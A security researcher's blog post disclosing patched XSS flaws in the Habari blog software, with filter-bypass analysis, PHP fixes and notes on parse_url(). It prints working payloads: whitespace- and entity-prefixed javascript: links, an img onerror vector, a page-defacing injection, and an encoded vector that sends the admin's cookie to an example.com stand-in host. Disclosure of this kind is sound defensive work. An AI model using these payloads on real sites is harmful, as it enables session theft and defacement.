I want to share some security issues I discovered about a month ago in Habari. All the vulnerabilities I'm talking about are fixed in Habari 0.7 RC3, after my collaboration with the Habari security team. That version was announced today, so I strongly encourage Habari users to update their blogs.

I recommend reading the whole blog post (it's not that boring), but if you want to skip the discussion of the Habari issues and jump straight to a nice trick for the PHP parse_url() function that bypasses a protocol check (HREF attribute), take a look at the end of this post.

1. Habari 0.6.6 (current stable version)

1.1 The protocol check for an HREF attribute (in the name, email and comment fields) can be bypassed.

Habari allows users to insert HTML code in post comments, but the "filtering" process is not implemented correctly. Let's consider the A tag; it is possible to insert links simply by writing:

<a href="http://ss.ss">click</a>

When an invalid protocol is used, the code is correctly rewritten as:


It seems the filtering process works well... but we can actually bypass the filter by inserting a leading whitespace character:

<a href=" javascript:alert(0)">click</a>

With this simple trick the protocol check is completely bypassed. Habari does require moderation for each comment, but an "inexperienced" admin could approve a malicious one and then click on it. I traced the issue to inputfilter.php, where a URL is considered relative when it starts with a whitespace: a particular regex fails to match, which allows the bypass. You can check the code to better understand what happens and how it behaves.

inputfilter.php -> line 282

It could be modified as follows:

inputfilter.php -> line 282
'(?P<scheme>[a-zA-Z ][^:]*):(//)?'
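As a sanity check (my own test harness, not Habari code; the anchor and delimiters are mine), the patched character class now captures the whitespace-prefixed vector as a scheme instead of letting it fall through as relative:

```php
<?php
// Hypothetical test of the patched regex: with the space added to the
// scheme's first-character class, " javascript" is captured as a scheme
// and can no longer masquerade as a relative URL.
$url = ' javascript:alert(0)';
if ( preg_match( '#^(?P<scheme>[a-zA-Z ][^:]*):(//)?#', $url, $m ) ) {
    echo "scheme: '" . $m['scheme'] . "'\n"; // scheme: ' javascript'
}
```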

But this would be a very naive ( => bad) approach!! There are other characters that bypass the filter; I'm going to talk about them below, so be patient... In any case, it is not a good idea to mark a link as relative just because it does not match the regex.

Note that the name field (the user who comments) and the email field are affected by the same issue.
So let's turn this vulnerability into an effective attack. The email field is shown in the private admin section, so the blog administrator could click on it directly. An attacker can supply this vector in the email field:

<a href=" javascript:open(eval(String.fromCharCode(39,104,116,116,112,58,47,47,101,120,97,109,112,108,101,46,99,111,109,47,63,99,111,111,107,105,101,61,39,32,43,32,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101)))">CLICK ME!</a>

That's too simple! We could also modify the admin page content through the DOM:

<a href=" javascript:eval(document.getElementById('site').innerHTML+=' Free sex? :P Go <a href=http://www.badsite.com>here</a>');">CLICK ME</a>

Cool screenshot:

1.2 Open tags are not automatically closed by the filter, so this can break the output.

The filter does not check whether an open tag is closed by the end of the comment, so the content of a page can be badly mangled. I mean: just by opening an A tag without closing it, whenever a new user tries to insert a new comment, he will end up clicking the injected link.

<a href=" javascript:alert(0)">click me

This is not a very important issue, because the administrator can quickly check the tag balance while moderating comments, and he can fix it by editing the comment content too.

2. Habari 0.7-dp3

2.1 The protocol check for an HREF attribute (in the name and comment fields) can be bypassed.

The email field is now filtered successfully, but the name and comment fields behave as before.

2.2 Open tags are not automatically closed by the filter, so this can break the output.

See section 1.2 for details.

2.3 IMG tags are not sanitized.

There are many ways to exploit this vulnerability; the simplest uses the following vector:

<img src="X" onerror="alert(1)">

Notice that no user interaction is needed in this case!! If the admin approves the comment, then every user who visits the blog will be "attacked". Wow! :P


The Habari team decided not to fix these issues in Habari 0.6.6: its input filter is drastically different from the one used in the 0.7 version. So they won't release any fixes for the current stable version, but they strongly encourage everyone to upgrade to 0.7. The fixes discussed below therefore apply to the 0.7 version.


Let's concentrate on the parse_url and glue_url functions (inputfilter.php); they validate the URLs supplied in an attribute.

parse_url( $url ): it is based on PHP's native parse_url(), but a leading space actually "breaks" the native function! "This function parses a URL and returns an associative array containing any of the various components of the URL that are present", from the manual.
By supplying something like " javascript:blablabla", the returned array has no 'scheme' ( == protocol ) and the whole string ends up in the 'path' slot. This means that many web applications that do not use this function correctly can be exploited... So even when the scheme is empty, we cannot immediately consider a URL relative and safe.

The Habari security team proposed this fix: it uses the trim() function to remove leading and trailing whitespace from the URL ( -> a naive approach ).

The filter can be bypassed again with HTML entities and hex encoding.

<a href="&#8;javascript:alert(0)">woot?!</a> // FF

<a href="&#160;&xa0;javascript:alert(0)">ooo</a> // Opera 11

Each entity in the URL is validated by the strip_illegal_entities( $str ) function, which calls _validate_entity( $m ). The injected entities are therefore converted into the corresponding characters and then submitted to the filtering process. For instance, &#8; is trivially "converted" to the BACKSPACE character (U+0008). There are plenty of other characters that bypass trim(), because it strips very few characters from the beginning and end of the input string. Take a look at the following resources:

- bypassing-a-protocol-check-href-attribute (by me)
- location.protocol fuzzer (by Gareth Heyes)
- Web Application Obfuscation (book), chapter 2, URIs section.
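A minimal sketch (my own, not Habari code) of why the trim()-based fix fails once the entity has been decoded: PHP's trim() only strips " \t\n\r\0\x0B" by default, so the BACKSPACE produced by &#8; survives:

```php
<?php
// &#8; decodes to U+0008 (BACKSPACE), which is not in trim()'s default
// character list, so the "sanitized" URL is unchanged and parse_url()
// still fails to see a scheme.
$url = "\x08javascript:alert(0)";

var_dump( trim( $url ) === $url ); // bool(true) — nothing was stripped
print_r( parse_url( $url ) );      // no 'scheme' key; everything lands in 'path'
```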

Considering the previous points, the following two lines then mark the parsed URL as relative. (code)

$r['is_pseudo'] = !in_array( $r['scheme'], array( 'http', 'https', '' ) );
$r['is_relative'] = ( $r['host'] == '' && !$r['is_pseudo'] );
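Putting the pieces together, a tiny standalone sketch (mine, mirroring the two checks above) shows how the whitespace-prefixed vector ends up marked as relative:

```php
<?php
// parse_url() sees no scheme and no host in " javascript:alert(0)",
// so both checks below pass and the malicious URL is "relative".
$p = parse_url( ' javascript:alert(0)' );
$scheme = isset( $p['scheme'] ) ? $p['scheme'] : '';
$host   = isset( $p['host'] )   ? $p['host']   : '';

$is_pseudo   = !in_array( $scheme, array( 'http', 'https', '' ) );
$is_relative = ( $host == '' && !$is_pseudo );

var_dump( $is_relative ); // bool(true)
```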

glue_url( $parsed_url ): it reassembles a URL that was taken apart by a parse_url() call. Given " javascript:blablabla" as input, the only work performed is appending the 'path' slot to the final reassembled URL:

if ( !empty( $parsed_url['path'] ) ) {
    $res .= $parsed_url['path'];
}

So how can we solve the issue?!

  • To remove the & character -> bad, because & is useful in URLs.
  • To mark as non-relative any URL that does not contain '.' or '/' characters -> bad, because those characters can appear in the javascript payload instead of the protocol.
  • To check whether the URL contains the ':' character -> the good way!! Note that I do not mark as relative a URL that does contain the colon character.

I proposed the following patch in the inputfilter parse_url() function (original line first, patched line second):

$r['is_relative'] = ( $r['host'] == '' && !$r['is_pseudo'] );

$r['is_relative'] = ( $r['host'] == '' && !$r['is_pseudo'] && (strpos($r['path'], ":") == false) );
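One detail worth noting about this check (a variant sketch of mine, not the exact patch I submitted): strpos() returns 0, which loosely equals false, when the colon is the very first character of the path, so the strict === comparison is the safer spelling:

```php
<?php
// Helper name is illustrative. A path is treated as relative only when
// it contains no colon at all; === false distinguishes "no colon found"
// from "colon found at position 0".
function path_has_no_colon( $path ) {
    return strpos( $path, ':' ) === false;
}

var_dump( path_has_no_colon( 'foo/bar' ) );              // bool(true)
var_dump( path_has_no_colon( ' javascript:alert(0)' ) ); // bool(false)
var_dump( path_has_no_colon( ':alert(0)' ) );            // bool(false) — == would give true
```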

In this way the issue is definitely solved!
Someone might think of bypassing the filter again by using &#58; or &#x3a; (IE8)... This is absolutely wrong because of the strip_illegal_entities( $str ) function.

The Habari guys decided not to follow my suggestion; they preferred to apply a regular expression to the URL before parsing it. They wanted to trim any Unicode whitespace-like characters from the string (not just the ASCII ones PHP's trim() handles), check this. Let's investigate again:

$url = ' javas cript:alert(0)';

$r = parse_url( preg_replace('/^[\pZ\pC]+|[\pZ\pC]+$/u', '', $url) );

// i) the regex matches strings that start or finish with a whitespace
// ii) info about pC and pZ: http://webcache.googleusercontent.com/search?q=cache:mCQugTShrlMJ:nadeausoftware.com/articles/2007/9/php_tip_how_strip_punctuation_characters_web_page+nadeausoft+how+to+strip&cd=3&hl=it&ct=clnk&gl=it&source=www.google.it
// iii) which characters are considered for the matching? *Some* of them are reported in http://www.bogofilter.org/pipermail/bogofilter/2003-March/001889.html

print_r ($r);


It looks like a nice fix! Can we bypass the filter again? For sure: just supply the whitespace in the middle of the URL!

<a href="javas cript:alert(0)">click</a>

Chrome and IE8 will definitely execute the alert! At the moment I know three characters that can be used in the middle of the protocol in Chrome and IE8, but of course they may change depending on the browser version:

1. U+0009 (TAB)  2. U+000A (LF)  3. U+000D (CR)

So Habari decided to follow a paranoid direction: the filter_var() function. The FILTER_SANITIZE_URL filter removes all illegal URL characters from a string, cool! But what about IDNs? This approach may cause problems with some URLs, e.g. Swedish ones. We would first have to encode the URL into punycode and only then apply the function, but that process can introduce other issues... (the security team was aware of this point). They also remarked that the ':' character is valid in a path, and therefore my previous fix was not perfect.
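A quick illustration (my own snippet) of why filter_var() closes the in-the-middle hole: FILTER_SANITIZE_URL strips characters that are illegal in a URL, including the tab that some browsers tolerate inside a scheme:

```php
<?php
// The tab (U+0009) is not a legal URL character, so the sanitizer
// removes it, and the reassembled 'javascript' scheme can then be
// rejected by the http/https whitelist.
$url = "javas\tcript:alert(0)";
echo filter_var( $url, FILTER_SANITIZE_URL ); // javascript:alert(0)
```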
Let's investigate by reading RFC 3986, the Relative Reference section:

A path segment that contains a colon character (e.g., "this:that") cannot be used as the first segment of a relative-path reference, as it would be mistaken for a scheme name. Such a segment must be preceded by a dot-segment (e.g., "./this:that") to make a relative-path reference.

So the best fix consists in checking whether a ':' character appears in the first segment of a relative-path reference. I proposed a fix along these lines, which in my opinion is a very good solution:

$r['is_relative'] = ( $r['host'] == '' && !$r['is_pseudo'] );

if ( strlen( $parsed['path'] ) > 0 ) {
    $s = substr( $parsed['path'], 0, 1 );

    // relative-path reference -> !(network-path reference OR absolute-path reference)
    if ( $s != '/' ) {
        $n = explode( '/', $parsed['path'] );

        // avoid something like this: javascript:alert(0)+[]+/sd/.source
        if ( count( $n ) > 1 && strpos( $n[0], ':' ) )
            $r['is_relative'] = false;
        // avoid something like this: javascript:alert(0)
        else if ( count( $n ) == 1 && strpos( $parsed['path'], ':' ) )
            $r['is_relative'] = false;
    }
}

if ( $r['is_pseudo'] ) {

In the end, the Habari security team fixed it in a cool way: by extracting a clean version of the supplied scheme. The solution uses PHP's filter_var() with the SANITIZE_URL filter to get a truly clean, sanitized scheme, but parses the rest of the data from the non-sanitized URL in order to keep supporting IDNs. It may not be the most elegant approach, but it is probably the cleanest.

I also have to report this: the fix to avoid HTML in the name field.


Actually there is no solution yet; with any luck it'll get fixed soon. However, you can check the ticket here.


IMG tags were treated as special cases because of their "self-closing" behaviour. First, the Habari team decided to remove any unmatched node types (details); then they adopted a whitelist for the attributes of IMG tags (src and alt) and improved the conditional that determines whether an attribute is valid (details).
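The whitelist idea can be sketched as follows (names and structure are illustrative, not Habari's actual implementation):

```php
<?php
// Only attributes on the per-tag whitelist survive; event handlers
// such as onerror are silently dropped.
$whitelist = array( 'img' => array( 'src', 'alt' ) );

function filter_attributes( $tag, array $attrs, array $whitelist ) {
    $allowed = isset( $whitelist[$tag] ) ? $whitelist[$tag] : array();
    return array_intersect_key( $attrs, array_flip( $allowed ) );
}

print_r( filter_attributes( 'img',
         array( 'src' => 'X', 'onerror' => 'alert(1)' ),
         $whitelist ) );
// Array ( [src] => X )
```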

As said before, all these vulnerabilities have been fixed and are reported in the release notes and here. Some of the fixes were already in RC2, but the URL filtering issue still affects that version, so you have to update to 0.7 RC3. The Habari security team took a lot of time to investigate and fix, but I understand that XSS protection cannot be improved in just one day. :)
They did not credit me, but it does not really matter.
Update: they credited and thanked me by updating the Habari 0.7 release announcement. Thank you guys! :)
In any case, I want to thank Chris Meller for his patience and his very constructive collaboration.


Comments about the PHP parse_url() function

Finally, I want to stress the fact that some characters in a URL force PHP's native parse_url() to output an interesting array: the scheme will be absent, while the path will contain the real protocol (e.g. javascript).

So let's consider the following PHP script:

$url = ' javascript:alert(0)';

$r = parse_url($url);
print_r ($r);

Of course, for a set of similar inputs, we get the following outputs:

javascript:alert(0)           ->  Array ( [scheme] => javascript [path] => alert(0) )
[space]javascript:alert(0)    ->  Array ( [path] => javascript:alert(0) )
&#8;javascript:alert(0)       ->  Array ( [path] => _javascript:alert(0) )
javascript:alert(0)           ->  Array ( [path] => javascript:alert(0) )
[tab]javascript:alert(0)      ->  Array ( [path] => _javascript:alert(0) )
[newline]javascript:alert(0)  ->  Array ( [path] => _javascript:alert(0) )
java[space]script:alert(0)    ->  Array ( [path] => java script:alert(0) )

In the output above, control characters are replaced by '_', while spaces (U+0020) "force" the 'javascript' into the path wherever they are supplied. Note that the PHP manual says: "This function doesn't work with relative URLs" and "This function is not meant to validate the given URL". So parse_url() is not a bad tool for checking a URL, but we need to use it in the right way!
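To close, here is one way (a sketch of mine, based on the RFC 3986 reading above; the function name is hypothetical) to use parse_url() "in the right way": whitelist the scheme, and refuse any scheme-less URL whose first path segment contains a colon:

```php
<?php
// Accept only http/https schemes; for scheme-less URLs, apply the
// RFC 3986 rule: a colon in the first path segment would be mistaken
// for a scheme, so such URLs must not be treated as safe relative links.
function is_safe_href( $url ) {
    $p = parse_url( $url );
    if ( $p === false ) {
        return false;
    }
    if ( isset( $p['scheme'] ) ) {
        return in_array( strtolower( $p['scheme'] ), array( 'http', 'https' ) );
    }
    $segments = explode( '/', isset( $p['path'] ) ? $p['path'] : '' );
    return strpos( $segments[0], ':' ) === false;
}

var_dump( is_safe_href( 'http://example.com/' ) );  // bool(true)
var_dump( is_safe_href( ' javascript:alert(0)' ) ); // bool(false)
var_dump( is_safe_href( './this:that' ) );          // bool(true)
```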
